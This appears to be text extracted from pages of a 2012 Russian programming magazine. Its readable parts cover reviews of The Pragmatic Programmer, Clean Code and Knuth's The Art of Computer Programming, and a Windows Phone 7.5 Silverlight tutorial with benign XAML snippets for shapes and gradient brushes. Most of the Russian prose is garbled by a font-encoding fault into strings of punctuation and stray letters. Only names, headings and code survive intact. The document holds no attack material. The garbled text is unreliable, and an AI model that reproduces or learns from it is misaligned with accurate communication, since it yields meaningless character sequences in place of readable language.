!. &#,3, ). R+$#- «!%).%"//+0#-(%"./"#+*»!"#0")11'4&--/")01)&'%' *$ 5%2#*9;&49 #& #&($&4&($**#4&'. <1$4&# =&#0# #*' '4/-&-();& ")3#4&7, /"'*'1)9 (-8#(- ' ")4/"#4&")*99 #/-&.

,/6# «G2+62#$$/-3-12#6$#3/:» 1+(,+-3?; +12#=05=#'3 -=+' ,#-

7=#,/'. ./:/-(+=#2? 6+=+2/3, 93+ 12#6$#3/: — A3+ 3+3, «:3+ -3#=/3 12#:3/9'-:4; 1+('7,+-3?, =5-6+04 =5@' =-'6+». G2+62#$$/-35-12#6$#3/:/ +2/',3/24;3-> = 1'2=4; +9'2'0? ,# 12#:3/9'-:4; 4-1'@,+-3? 2'#(/74'$5F 12+':3+=. K=3+25 ,# +-,+=#,// -=+'6+ 8+6#-3'B@'6+ +153# 12+62#$$/2+=#,/> -+70#(/ -324:342/2+=#,,5B ,#8+2 12#:3/9'-:/F -+='3+= 0(> 12+62#$-$/-3+=. Q'8+(?@+B 2#7$'2 :,/6/ (270 -32#,/E) 6+=+2/3 + =5-+:+B :+,E',32#E// =#*,+B 0(> 12+62#$-$/-3# /,L+2$#E//.

G2#:3/9'-:/ =-' /7(#6#'$5' = :,/6' 3'$5 1+>-,>;3-> =52#7/-3'(?,5$/ #,#(+6/>$/, :+3+25' 1+2+B 1+2#*#;3 -=+'B 3+9,+-3?;. . :,/6' 12+=+0>3-> 1#2#(('(/ $'*04 ,':#9'-3=',,5$ :+0+$ / 3'+2/'B 2#78/3+6+ +:,#, -3+(>2,5$ 0'(+$ / 2#8+3+B 12+62#$$/-3#, =+*0',/'$ #=3+$+8/(> / ,#1/-#,/'$ :+0#, -32'(?8+B 32#--/24;D/-$/ 14(>$/ / -+70#,/'$ 12+3+3/1+= GC, F+*0',/'$ 1+ $/,,+$4 1+(; / 12+62#$$/2+=#,/'$ = 2#-9'3' ,# -3'9',/' +8-3+>3'(?-3=. . :+,E' :#*0+6+ 2#70'(# 12/=+0>3-> =+12+-5 0(> +8-4*0',/> / 412#*,'-,/>, 93+ (/@,/B 2#7 1+09'2:/=#'3 12#:3/9'-:4; ,#12#=(',,+-3? :,/6/.

C0,/$ /7 -#$5F 7#$'9#3'(?,5F 12/,E/1+= 12+62#$$/2+=#,/>, :+3+25$ $5 +8>7#,5 #=3+2#$, >=(>'3-> 12/,E/1 DRY (Don’t Repeat Yourself), 93+ = 1'2'=+0' ,# 24--:/B +7,#9#'3: «Q' 1+=3+2>B -#$+6+ -'8>». !3+ 1+02#74$'=#'3, 93+ :#*05B L2#6$',3 7,#,/> 0+(*', /$'3? '0/,-3=',,+' / +0,+7,#9,+' 12'0-3#=(',/' = -/-3'$'. M('0+-=#,/' 0#,,+$4 12/,E/14 1+7=+(>'3 1+=5-/3? ,#0'*,+-3?, 0+-341-,+-3? / 12+-3+34 -+12+=+*0',/> 12+62#$$,+6+ 12+04:3#.

. 6(#=', 1+-=>D',,+B +8D'B L/(+-+L// 12#6$#3/9,+6+ 12+-62#$$/2+=#,/>, $5 47,#'$, :#:/$ #=3+25 =/0>3 12+62#$$/-3#-12#6$#3/:#: +, =-'60# 12/,/$#'3 +3='3-3=',,+-3? 7# -=+B :+0, -('0/3 7# -+-3+>,/'$ -=+'6+ 12+04:3#, 1+-3+>,,+ -+='2@',-3=4'3->, +8D#'3-> / ,#F+0/3 :+$12+$/-- - 1+(?7+=#3'(>$/. "(#=# «G2#6-$#3/9'-:/B 1+0F+0» 6+=+2/3 +8 +8D/F $'3+0/:#F 2#72#8+3:/ / +E',:/ 3240+'$:+-3/ 12+':3+=. .#*,'B@#> 6(#=# «"/8:+-3? 12+3/= F241:+-3/» 2#--:#75=#'3, :#:/$ *' +82#7+$ ,'+8F+0/$+ -+70#=#3? 0'B-3=/3'(?,+ 6/8:/' / 4-3+B9/=5' : /7$',',/; -/-3'$5. S7 6(#=5 «G'2'0 3'$, :#: ,#9#3? 12+':3» $+*,+ 47,#3? + 12+E'042' L+2$/2+-=#,/> / 43='2*0',/> 32'8+=#,/B : -/-3'$'. «G2#6$#3/9'-:/' 12+-':35» 7,#:+$>3 ,#- - :2/3/9'-:/$/ #-1':3#$/ -+70#,/> 2'#(?,5F 12+':3+=, 3#:/$/ :#: 2#8+3# = :+$#,0', 3'-3/2+=#,/' / L+2$/2+=#-,/' 0+:4$',3#E//.

O0/,-3=',,+', 93+ $+*'3 1+01+23/3? =1'9#3(',/' + :,/6', 3#: A3+ ,'0+-3#3+9,+ :#9'-3=',,5B 1'2'=+0 ,# 24--:/B >75: / ,#(/-9/' $,+*'-3=# +1'9#3+:. I,/64 (49@' =-'6+ 9/3#3? = +2/6/,#(' ,# #,6(/B-:+$ >75:'.

Q'(?7> ,' -+6(#-/3?-> - +375=+$ I',3# J':#: «"(#=,+' = A3+B :,/6' 3+, 93+ +,# 1+00'2*/=#'3 12+E'-- -+70#,/> 12+62#$$ = F+2+@'B L+2$'. [I,/6#] -1+-+8-3=4'3 =#@'$4 1+-3+>,,+$4 2+-34 / >=,+ ,#1/-#,# (;0?$/, 7,#;D/$/ 3+(: = 12+62#$$/2+=#,//». O-(/ =5 -32'$/3'-? : 1+-3+>,,+$4 2+-34 :#: 12+62#$$/-3, A3# :,/6# +8>7#3'(?,# : 12+93',/;.

+ !

6 !"#$%&' (%)! * (*+)%!,

!"#$% 09 /164/ 2012 097

-. .#/0)%

«!"#$%& '()»!"#$%# &%'()* +%'),- ./0 — )12#3(1 4(5/)(. 6$( $# /74($%+%8(#)'1 9$($%#" &())#4$/8 % &4%$:%&/8. ;(0 ./0/" $#/5</0%"/ &/&/)#)*.

%)!# «1)20&3 (*+» — *+%* )4 %#)5*",, 6+#7%&' )4+#%)3, 8*-

2$9:,%%&' %#8)2#%); $&2*(*-(#7,20$,%%*!* (*+#. -#4<,/ (%)!) *(*"* 400 20/#%)=. >/) ?0*< *%# %#20*"@(* 6$",(#0,"@%# ) +*2068-%#, 70* 4# +$#-0/) $,7,/# 4#8/*20* 8/*7)0#,A@ ,, *0 (*/() +* (*/(). B +/6C,2(*3 <#%,/, «+9+;A(#» D*5 /#22(#4&$#,0 %#<, (#()<) C, 8/)%=)8#<) %6C%* /6(*$*+20$*-$#0@29, 70*5& 8)2#0@ '*/*A)3 (*+. E%)!# )4*5)-"6,0 8/)<,/#<) )4 /,#"@%&' 8/)-"*C,%)3, 2 (*0*/&<) #$0*/ 20#"-()$#"29 $ 2$*,3 8/#(0)(,. F/,+) %)' 0#(), )4$,20%&, 8/*+6(0&, (#( JUnit, FitNesse, JDepend, Ant ) TomCat.

E%)!# /#4+,",%# %# 0/) 7#20). >,/$#9 7#20@ — 0,*/)9 %#8)2#%)9 «7)20*!*» (*+#: 8/),<&, 8#00,/%& ) 8/)%=)8&, (*0*/&< %,*5'*+)<* 2",+*$#0@ /#4/#5*07)(6. B0*/#9 7#20@ %*2)0 8/#(0)7,2()3 '#/#(0,/ ) 8*+/*5%* *8)2&$#,0 2#< 8/*=,22 «7)20()» (*+# 26:,20$6;:)' 8/)-"*C,%)3. G/,0@9 7#20@ 8*+$*+)0 )0*!) $2,3 (%)!) ) 2*+,/C)0 8,/,7,%@ «4#8#'*$ (*+#» ) <,0*+*$ )' 620/#%,%)9.

B 0,*/,0)7,2(*3 7#20) 8*+/*5%* *8)2&$#;029 8/)%=)8& )<,%*-$#%)9 8,/,<,%%&', <,0*+*$ ) ("#22*$, 8/#$)"# 2*4+#%)9 H6%(=)3, %#8)2#%)9 (*<<,%0#/),$, H*/<#0)/*$#%)9 (*+# ) %#8)2#%)9 <*+6"@-%&' 0,20*$. -*5,/0 +#,0 8*%90@, 70* '*/*A* %#8)2#0@ (*+ %,+*20#0*7%*. I,*5'*+)<* 8*++,/C)$#0@ ,!* 7)20*06 2 0,7,%),< $/,<,%), 70*5& 8/,+*0$/#0)0@ «4#!%)$#%),». >*?0*<6 *% $$*+)0 «8/#$)"* 5*32(#6-0#»: «J20#$@ <,20* 20*9%() 7):,, 7,< *%* 5&"* +* 0$*,!* 8/)'*+#». >/) 2*4+#%)) H6%(=)3 $* !"#$6 6!"# 20#$9029 (*<8#(0%*20@, 8/#$)"* *+%*3 *8,/#=)) ) *+%*!* 6/*$%9 #520/#(=)). D6+67) 9/&< #+,80*< TDD, .#/0)% 6(#4&$#,0 %# $#C%*20@ «7)20*0&» %, 0*"@(* (*+# (*%,7%*!* 8/*+6(0#, %* ) (*+# <*+6"@%&' 0,20*$. J% )/*%)7,2() 4#<,7#,0: «E#()-<) *0")7)0,"@%&<) 8/)4%#(#<) '#/#(0,/)46,029 7)20&3 0,20? G/,<9: 6+*5*7)0#,<*20@;, 6+*5*7)0#,<*20@; ) 6+*5*7)0#,<*20@;».

B %#7#", (%)!) -*5,/0 8/)$*+)0 *0$,0& <?0/*$ 8/*!/#<<)/*$#%)9 %# $*8/*2, 70* C, 0#(*, «7)20&3 (*+». K/?+) D67 *0$,7#,0: «1)20&3 (*+ 8/*20 ) 8/9<*")%,,%. 1)20&3 (*+ 7)0#,029, (#( '*/*A* %#8)2#%%#9 8/*4#». >/*!/#<<)20&, (*0*/&, 20/,<9029 8)2#0@ «7)20&3 (*+», 8/*20* *594#%& 8/*7)0#0@ ?06 (%)!6.

L. E%60

«*#'+##$,( -.(/.011".(,02"3»=>+?%- '&/'/5 8 +#"-)/ 4(9/54()*'1 0/ ./$:( — @)/ &/&4/5/8()* $(>+%)* @)/"> ./"&*A)#4.

/*!/#<<)20, 6 (*0*/*!* %,0 (%)!) «M2(6220$* 8/*!/#<-<)/*$#%)9», (#( 2$9:,%%*-

2"6C)0,"@, 6 (*0*/*!* %,0 D)5")). .*%*!/#H); L*%#"@+# E%60# 7#20* %#4&$#;0 «D)5"),3 8/*!/#<<)20#». J%# 2*+,/C)0 8*+/*5%*, *8)2#%), ) #%#")4 $#C%,3A)' H6%+#<,%0#"@%&' #"!*/)0<*$, )28*"@46,<&' $ )%H*/<#-0)(,, # 0#(C, <%*C,20$* 8/#(0)7,2()' 4#+#7 +"9 62$*,%)9 ) 4#(/,8",%)9 8/,+20#$",%%*!* <#0,/)#"#. N6/%#" American Scientist $(";7)" /#5*06 E%60# $ 28)2*( +$,%#+=#0) "67A)' H)4)(*-<#0,<#0)7,2()' <*%*!/#H)3 XX $,(# %#/9+6 2 /#5*0*3 O3%A0,3%# 8* 0,*/)) *0%*2)0,"@%*20). P28,' (%)-!) *8/,+,")"* (#7,20$* )4"*C,%)9 ) !"65)%# #%#")4# *5:)' $*8/*2*$ 8/*!/#<<)/*$#%)9.

E%60 %#7#" /#5*06 %#+ «M2(6220$*< 8/*!/#<<)/*$#%)9» ,:, $ 1962 !*+6. >* 4#<&2"6 #$0*/# <*%*!/#H)9 +*"C%# 2*20*90@ )4 2,<) 0*<*$. >*(# 5&"* )4+#%* 0/) 8,/$&' 0*<#, # 0#(C, 8,/$#9 8*"*$)%# 7,0$,/0*-!*. B2, )4+#%%&, %# 2,!*+%9A%)3 +,%@ <#0,/)#"& 2*20#$"9;0 8*70) 3000 20/#%)=. 1)0#0@ (%)!6 2*$2,< %, 8/*20* ((#(, $8/*7,<, ) D)5");), !"#$%&< *5/#4*< 8*0*<6, 70* $2, 8/)<,/& /#22<#0/)$#;029 %# %)4(*-6/*$%,$*< 94&(, 8/*!/#<<)/*$#%)9 — #22,<5",/, +"9 !)8*0,0)7,2(*!* $&+6<#%%*!* #$0*/*< (*<8@;0,/# MIX. >*?0*<6 6 8/*!/#<<)20# $/9+ ") 8*"67)029 )28*"@4*$#0@ (%)!6 $ (#7,20$, %#5*/# !*0*$&' /,=,80*$ +"9 /,A,%)9 (*%(/,0%&' 4#+#7. O0# (%)!# +#,0 8/*!/#<<)206 %, /&56, # 2(*-/,, '*/*A6; 6+*7(6, 2 8*<*:@; (*0*/*3 *% 2<*C,0 %, 5,4 *8/,+,",%%&' 62)")3 2#<*20*90,"@%* %#"*$)0@ /&5&.

>,/$&3 0*< 8*2$9:,% *2%*$%&< #"!*/)0<#< ) 2*20*)0 )4 +$6' !"#$. >,/$#9 !"#$# 8*+!*0#$")$#,0 7)0#0,"9 ( /#5*0, %#+ (%)!*3. Q+,2@ /#2-2<#0/)$#;029 *2%*$%&, <#0,<#0)7,2(), 8*%90)9 ) 0,*/,<&, %# (*0*/&' 5#4)/6,029 $,2@ <#0,/)#". 1)0#0,"@ 4%#(*<)029 2 «8*")%,%#2&:,%%&< (*<8@;0,/*<» MIX, ,!* #/')0,(06/*3 ) ,!* 94&(*< #22,<5",/#. B0*/#9 !"#$# 8*2$9:,%# )%H*/<#=)*%%&< 20/6(06/#< ) #"!*/)0<#< /#5*0& 2 %)<). Q+,2@ /#22<#0/)$#;029 +,/,$@9, <%*!*2$94%&, 20/6(06/&, ")%,3-%&, 28)2(), $ 0*< 7)2", 20,(), *7,/,+), +,(), =)(")7,2(), ) +$#C+& 2$94#%%&, 28)2() ) 8/*7,,.

B0*/*3 0*< $(";7#,0 $ 2,59 0/,0@; ) 7,0$,/06; !"#$&. G/,0@9 !"#$# 8*2$9:,%# /#5*0, 2* 2"67#3%&<) 7)2"#<) ) 8*2",+*$#0,"@%*209<). B 7,0$,/0*3 !"#$, *8)2&$#;029 $*8/*2& #/)H<,0)(), # )<,%%* /#4")7-%&, $)+& 2)20,< 27)2",%)9, #/)H<,0)(# 7)2," 2 8"#$#;:,3 0*7(*3 ) /#=)*%#"@%&' 7)2,", 8*")%*<)#"@%#9 #/)H<,0)(# ) +/6!*,. G/,0)3 0*< 8*2$9:,% #"!*/)0<#< 2*/0)/*$() ) 8*)2(# (2**0$,020$,%%*, !"#$& 5 ) 6). M4 7,0$,/0*!* 0*<# *865")(*$#%& <#0,/)#"& 2,+@<*3 !"#$&, *8)2&$#;-:,3 $*8/*2& (*<5)%#0*/%*!* 8*)2(#.

M2'*+9 )4 8"#%*$ #$0*/#, $ 7,0$,/0&3 0*< 0#(C, $*3+,0 $*2@<#9 !"#-$#, $ (*0*/*3 /#22<#0/)$#;029 /,(6/2)$%&, #"!*/)0<&. >90&3 0*< 56+,0 2*+,/C#0@ <#0,/)#"& 8* 2)%0#(2)7,2()< #"!*/)0<#<, $ 0*< 7)2", 8* ",(2)(*!/#H)7,2(*<6 ) 2)%0#(2)7,2(*<6 8*)2(6. JC)+#;:), )4+#%)9 A,20*3 ) 2,+@<*3 0*<# 56+60 8*2$9:,%& 0,*/)) 94&(*$ ) (*<8)"90*/#<.

B 2$*,< *04&$, * /#5*0, E%60# D)"" K,302 2(#4#": «R2") $& 27)0#,0, 2,59 +,320$)0,"@%* '*/*A)< 8/*!/#<<)20*<… 8/*7)0#30, „M2(6220$* 8/*!/#<<)/*$#%)9“ (E%60#)… R2") $& 2<*C,0, 8/*7,20@ $,2@ ?0*0 0/6+, 0* $#< *8/,+,",%%* 2",+6,0 *08/#$)0@ <%, /,4;<,». S)0#0# ")A%)3 /#4 8*+7,/()$#,0, 70*, %,2<*0/9 %# 2"*C%*20@ <#0,/)#"#, %#20*9:)3 8/*-H,22)*%#" *594#0,"@%* +*"C,% *2)")0@ 0/6+ L*%#"@+# O/$)%# E%60#.

QTEUV1RIMR Q%#7,%), '*/*A)' (%)! 8* 8/*!/#<<)/*$#%); 2"*C%* 8,-/,*=,%)0@. E#C+#9 )4 *8)2#%%&' (%)! 8*4$*"9,0 2*$,/A)0@ *!/*<%&3 2(#7*( $ /#4$)0)). «M2(6220$* 8/*!/#<<)/*$#-%)9» 4#("#+&$#,0 8/*7%&3 H6%+#<,%0, *567#9 %#2 H6%+#-<,%0#"@%&< #"!*/)0<#< ) 8/),<#< 8/*!/#<<)/*$#%)9. «F*$,/A,%%&3 (*+» 8*4$*"9,0 $&30) %# %*$&3 (#7,20$,%-%&3 6/*$,%@ (*%20/6)/*$#%)9 >J. «1)20&3 (*+» ) «-,H#(-0*/)%!» 67#0 %#2 $%)<#0,"@%,, *0%*2)0@29 ( (#7,20$6 (*+# ) 8*++,/C)$#0@ ,!* $ )+,#"@%*< 2*20*9%)). «>/*!/#<<)20-8/#!<#0)(» 8*+2(#4&$#,0, (#( C, /,#"@%* +*5)0@29 8/#(-0)7,2(*!* 628,'# 8/) /#4/#5*0(, >J. «>#00,/%& 8/*,(0)-/*$#%)9» $**/6C#;0 09C,"*3 #/0)"",/),3 8#00,/%*$ +"9 /,A,%)9 <%*C,20$# 4#+#7 8/*,(0)/*$#%)9. z

#&

!"#$%& !"#$ «yurembo» %&'( (yazevsoft@gmail.com)

'(!)* 09 /164/ 2012098

! "#$%&$' ($')#) * $+),-& (-"./-01 2&* 0)+* /0-013 / 4$2)#/4.'. #)5)"0-'., ($ 67) "#$ .(0)#8)9/:. ;)#7. $+),-(($)! <#$=.0-> ?06 /0-013, +)@ >/*4$9 "$2A$0$>4. 0: /'$7)%1 /2)&-01 >"$&() /$>#)')((:9, 2.(-'.=(:9 . @->./*,.9 $0 "$4-@-(.9 -4/)&)#$')0#- 8)9/ 2&* />$)9 "#$A#-'':.

Face of Windows Phone

!"#$"%&&'"#(%)'* ')+*",*-.#(/01 WP 7.5 ( $#+#(23 "*4*!+%3

Face of Windows Phone

!"#$% 09 /164/ 2012 099

!""#$%&'()* "+,-.,-/ -0123/ . 4-054/ 67 3,8/09/:+; — <8- =->,7? 3,8/@03-0-.7,,7? +0/A7 076074-8B3 Visual Studio 2010. ! +C3,1 /: A;D38 0/A7B8-0 AE? .3617E5,-@- =-A/E30-.7,3? Expression Blend; AE? 076074-8B3 Windows Phone C03E-2/,3: -, 4/+CE78,;:, . -8-E3F3/ -8 +.-/@- A/+B8-C,-@- 7,7E-@7. !3617E5,-/ ,7C-E,/,3/ ") Windows Phone -8-40727/8+? (3, 0761=//8+?, =-A1E301/8+?) +0/A+8.7=3 Silverlight. G7 =-=/,8 ,7C3+7,3? <83H +80-B .;DE7 12/ C?87? ./0+3? Silverlight, ,- . WP C--C0/2,/=1 3+C-E561/8+? C0/A;A1>7?, F/8./087? ./0+3?.

XAML IE? -C3+7,3? C-E56-.78/E5+B-@- 3,8/09/:+7 C03E-2/,3: AE? Windows Phone, 07.,- B7B 3 A01@3H .3A-. Silverlight- 3 WPF-C03E-2/,3:, 3+C-E561/8+? A/BE70783.,;: ?6;B XAML. ", C0/A-+87.E?/8 +-4-: 07+D30/,,;: ?6;B 076=/8B3 ,7C-A-43/ XML. XAML C-?.3E+? .=/+8/ + 80/85/: ./0+3/: .NET . B-,J/ 2006 @-A7 3 4E7@--A70? +.-/=1 1A-4+8.1 +87E -F/,5 D30-B- 07+C0-+807,/,. XAML ,7+E/A1/8 -C3+78/E5,1K @34B-+85 XML, C-6.-E?? E/@B- A-C-E,?85 +1>/+8.1K>3/ +H/=; ,-.;=3 <E/=/,87=3. I7.7: 07++=-803= <E/-=/,8; ?6;B7 3 1.3A3=, F8- + 3H C-=->5K =-2,- +A/E785.

1. !"#$% &'(&")" *+#,"(-&#..2. /01"(2-&#- + 34-&#- "*#$0&#. # *+"$5"4+ 4#4',6&"7 %0+4#&%# ("3-&6 80(&97 :40*, '$*-1 %"4"+")" ";&030-4 *-+-1"2 % $,-2'<=-5').3. >%03#80&#- + #$*940&#- 2-5".4. !"%'*%0 *",&"7 8-+$##.5. ?$*",6;"80&#- *+#,"(-&#..6. @20,-&#-. !",6;"804-,6$%#7 #&4-+A-7$ #)+0-4 80(&-7B'< +",6 &0 28'1 :40*01 (3 # 5).

!"#$%$$&' (")* +,-"*.$,/, 01"*,!%$"2 3 4,5)" #1%$"2 0,*.#,674%*2

!,7F7E/ C-+=-803= ,7 +-6A7,3/ @/-=/803F/+B3H -4L/B8-.. ! +81A33 +-6A7: ,-.-/ Silverlight-C03E-2/,3/ AE? WP. )/:F7+ ,7D/ .,3=7-,3/ 41A/8 C03B-.7,- B 97:E1 MainPage.xaml, ,- +,7F7E7 .6@E?,3 .,1805 97:E7 App.xaml. ", 3,8/0/+/, 8/=, F8- . ,/= -C0/A/E?K8+? F/8;0/ 236,/,,- .72,;H AE? B72A-@- WP-C03E-2/,3? +-4;83?: Application_Launching, Application_Closing, Application_Activated, Application_Deactivated. M-A0-4,// - ,3H ? 12/ 07++B76;.7E (. =70-8-.+B-: +8785/). "C3+7,3? 91,BJ3: AE? <83H +-4;83: +-A/0278+? . 97:E/ App.xaml.cs.

IE? 1A-4+8.7 36 97:E7 MainPage.xaml 1A7E3 +-A/023=-/ 8/@7 Grid, B-8-0;: 3=//8 7803418 x:Name="LayoutRoot". N/= +7=;= + <B07,7 <=1E?8-07 8/E/9-,7 41A/8 1A7E/,- .+/ E3D,//.

!+/@- . Silverlight +-A/0238+? D/+85 @/-=/803F/+B3H C03=383.-.: C0?=7? E3,3?, E-=7,7? E3,3?, C0?=-1@-E5,3B, =,-@-1@-E5,3B, <EE3C+ 3 C185. )80-@- @-.-0?, C185 ?.E?/8+? -+,-.,;= 83C-= @/-=/8033, 87B B7B .+/ -+87E5,;/ +80-?8+? ,7 /@- -+,-./. O C03=/01, F8-4; ,703+--.785 B03.1K, 3+C-E561? =/8-A P/65/, A-+878-F,- ,7C3+785:

<Path Stroke="White"> <Path.Data> <PathGeometry> <PathFigure StartPoint="50,50"> <BezierSegment Point1="500,0" Point2="500,200" Point3="150,300"/> </PathFigure> </PathGeometry> </Path.Data></Path>

! C/0.-: +80-B/ 67A7/8+? J./8 B-,8107 AE? 03+-.7,3?, +E/-A1K>3= 8/@-= ,7F3,7/8+? -4E7+85 -C3+7,3? A7,,;H C183, 8/@ <PathGeometry> +--4>7/8 B-=C3E?8-01, F8- A7E// 3A18 A7,,;/, -C0/A/E?K>3/ @/-=/803K: 67A7/8+? +/@=/,8, +-+8-?>3: 36 80/H 8-F/B, B72A7? +- +.-3=3 B--0A3,787=3. Q8-4; 36-4076385 <EE3C+ B07+,-@- J./87, A-+878-F,- -A,-: +80-FB3 B-A7:

<Ellipse Name="ellipse1" Stroke="Red" Margin="53,544,227,124" />

O7B 3 . HTML, =,-@3/ -4L/B8; . Silverlight =-2,- -C3+785 C--A-4,;=3 +-B07>/,,;=3 67C3+?=3.

(-2,- />/ 4-E// +-B078385 C03./A/,,1K .;D/ 67C3+5, 1A7E3. 7803418 Name (-, ,12/, 8-E5B- . 8-= +E1F7/, /+E3 B -4L/B81 41A/8 CE7,30-.785+? -407>/,3/ 36 B-A7). ! C-+E/A,/= 780341-8/ 67A7K8+? B--0A3,78; 3 076=/0; C03=383.7. R7=/85, F/8;0/ 6,7F/,3? -C0/A/E?K8 left, top, right, bottom — C-E? -8+81C7 -8 +--8./8+8.1K>3H B07/. -4L/B87 0-A38/E?. ! A-C-E,/,3/ B 07+-+=-80/,,;= .+/ C03=383.; -4E7A7K8 A01@3=3 +87,A708,;=3 78034187=3: Width, Height, Fill. M/0.;/ A.7 67A7K8 D303,1 3 .;+-81 C03=383.7, 7 C-+E/A,3: — J./8 AE? 67B07+B3. O0-=/ 8-@-, AE? 67B07D3.7,3? 93@10; +E1278 C?85 +83E/:, B72A;: 36 B-8-0;H B07+38 C03=383. -+-4;= -4076-=: SolidColorBrush B07+38 +CE-D-,;= J./8-=, LinearGradientBrush B07+38 E3,/:,;= @07A3/,8-=, RadialGradientBrush — 07A37E5,;= @07A3/,8-= (8- /+85 . <8-= +E1F7/ J./8 =/,?/8+? C- -B012,-+83, ,7F3,7? -8 J/,807E5,-: 8-FB3 A- 8-FB3, ,7H-A?>/:+? ,7 B07K -4E7+83 67B07D3.7,3?), ImageBrush — .=/+8- 67B07+B3 J./8-= 3+C-E561/8+? ,7E-2/,3/ 8/B+810;, VideoBrush — 8- 2/ +7=-/, F8- . C0/A;A1>/= +E1F7/, 8-E5B- 3+C-E561/8+? .;.-A .3A/-.

S+C0-41/= A-C-E,38/E5,;/ 7803418;: +-6A7A3= 67B07D/,,;: C0?=-1@-E5,3B, C03=/,?? +83E5 07A37E5,-@- @07A3/,87:

<Rectangle Margin="275,526,28,83"> <Rectangle.Fill> <RadialGradientBrush> <GradientStop Color="Yellow" Offset="0.2" /> <GradientStop Color="White" Offset="0.6" /> <GradientStop Color="Blue" Offset="1" /> </RadialGradientBrush> </Rectangle.Fill></Rectangle>

!"#"$% 1. &"'("%!)*

+),-./01'" 1.$'/1"1)" '2 WINDOWS PHONE '%'3!.4."%2* ), !.,-(""%2*, ('5-/)!-"%2* 2!"52%+.() SILVERLIGHT

!"#$%&

'(!)* 09 /164/ 2012100

!"#. 3. Pivot!"#. 2. Panorama

!"#. 1. $%&'()*+,"+ #-%.'"

!"#$%#&' ()*+ ,-.*' '/0',*#0(# 1'2 0'3#"'3 7.10.8773.98, 2'/4,(,-.## 5046($#*%0-#, 04 3'7 ,5&*+2 , 890:;((. <41"(3#", =$4*' ,'53'>-0-3 (31'"$("',4$% ( ?:=1'"$("'-,4$% :'0$4:$0-# 2400-# = $#*#8'04 04 SIM-:4"$9 ( '/"4$0'. @$4/(*%-0'=$% ( /#5'14=0'=$% "4/'$-, /92#3 042#+$%=+, $'># /-*( 9*96.#0-. A*+ ?$'&' MS ,#2% ( ,-19=:4#$ '/0',*#0(+?

WP 7.5

! "#$"%&' ($)($*+%#,-$, "./0"%1.0% 23+40"%1+ +*50-%+1 .6($1-703,8 (-+26+303%+1), " 6+2+/&' -+%+(9: 2+43+ -+26+3+1$%& 6(,7+403,0, $ 6+7&)+1$%07, )$%02 2+;.% ,2 .6($178%&; -+7,#0-"%1+ +*50-%+1 2+43+ 6+6+738%&. < =%+2 (0>06%0 29 ($""2+%(,2 7,?& 30*+7&?.' ,: #$"%&, 19@07,1 ,: 1 +*+*/03390 6+@;(.669, $ " +"%$7&392, %9 ($)*0(0?&"8 6+ :+@. @07$, +6,($8"& 3$ +*/,0 "1+A"%1$ ";(.66,(+1$339: -+26+303%+1.

<"0 -+3%(+79 2+43+ ($)@07,%& 3$ 68%& -$%0;+(,A: 6(+"%90 =70-203%9 .6($1703,8, =70203%9 " "+@0(4,292, "6,"-,, -+3%0A30(9 , -+26+303%9, 6(,"./,0 %+7&-+ "2$(%B+3..

C+A@02 6+ 6+(8@-.. ! 6(+"%92 =70203%$2 .6($1703,8 +%3+-"8%"8 ($)390 %0-"%+190 20%-, (TextBlock), 6+78 11+@$ (TextBox, PasswordBox), -$(%,3-, -+26+303% Image, 6+7).3-, (Slider), 6+7+"9 "+"%+83,8 (ProgressBar) , @(.;,0. D+ 0"%& =%+ %$-,0 -+26+303%9, -+-%+(90 30 2+;.% "+@0(4$%& 6+@+*50-%9. ! =70203%$2 " "+@0(4,292 +%3+"8%"8 ($)7,#390 -3+6-, (+*50-%9 -7$""+1 Button, RadioButton, HyperlinkButton, CheckBox) — *7$;+@$(8 "1+A"%1. Content +3, 2+;.% "+@0(4$%& @(.;,0 -+26+303%9. E6,"-, 6(0@"%$178'% "+*+A -+7-70->,, @78 +*50-%+1 +6(0@07033+;+ %,6$, %$-,: -$- ListBoxItem, MenuItem, Separator , @(.;,:. F7$13$8 (+7& "6,"-+1 — +*0"60#03,0 3$*+($ +@3+%,639: =70203%+1. E6,"-, 1 Silverlight 6(0@"%$17039 -7$""$2, ListBox, ContextMenu, ListPicker, DatePicker , @(.;,2,. !$- "70@.0% ,) 3$)1$3,8, -+3%0A30(9 6(0@3$)3$#039 @78 3$-+-6703,8 , "+@0(4$3,8 @(.;,: -+26+303%+1. G3, 30 ,20'% 1,).$7&-3+;+ ,3%0(B0A"$, 3+ 6+)1+78'% "+)@$1$%& 3$ =-($30 "2$(%B+3$ +6(0@07033.' ($)20%-., 1 -+%+(+A 2+40% 3$:+@,%&"8 6(+,)1+7&3+0 -+7,#0"%1+ @+#0(3,: =70203%+1; 6+"70@3,0 2+;.% *9%& 6(0@"%$1-

7039 =-)02678($2, 7'*+;+ -7$""$. ! -+3%0A30($2 +%3+"8%"8 #0-%9(0 -+26+303%$: .40 ,)10"%39A 3$2 Grid, 6(0@"%$178'/,A "+*+A %$*7,>.; StackPanel, ,20'/,A 1,@ "%(+-, ,7, "%+7*>$, 1 -+%+(+2 2+;.% 3$:+@,%&"8 6+@+*50-%9; -+3%0A30( ScrollViewer 6+)1+78-0% 6(+-(.#,1$%& "1+0 "+@0(4,2+0 1 "7.#$0, 0"7, +3+ )$3,2$0% *+7&?00 6(+"%($3"%1+, #02 +3 "$2; 13.%(, -$319 (Canvas) 2+43+ 6(+,)1+7&392 +*($)+2 ($)20/$%& =70203%9, %+ 0"%& 1 +%7,#,0 +% +"%$7&39: =%+% -+3%0A30( 30 ,200% "%(+;+A ($)20%-,.

C+"70@388 -$%0;+(,8 -+26+303%+1 6(0@"%$1780%"8 230 3$,*+-700 ,3%0(0"3+A, 6+"-+7&-. 30 ,200% $3$7+;+1 1 @(.;,: (0$7,)$>,8:

DVD

/0 &"#'+ ,01%&23#2 4#+ 5."6+.7, "(()#3.".8)9"+ %5"#0,,7+ 4 #303:+ .+;+537.

WWW

www.microsoft.com — 6,%<% 5%(+=,%> ",?%.60;"" % Windows Phone, Silverlight " #%583#348)9"1 3+1,%(%<"21 (%<%, ,+5(%1%> #0>3! — $."6. .+&.).

!"#"$% 2. &'"(")%* +$!,-'")./

Face of Windows Phone

!"#$% 09 /164/ 2012 101

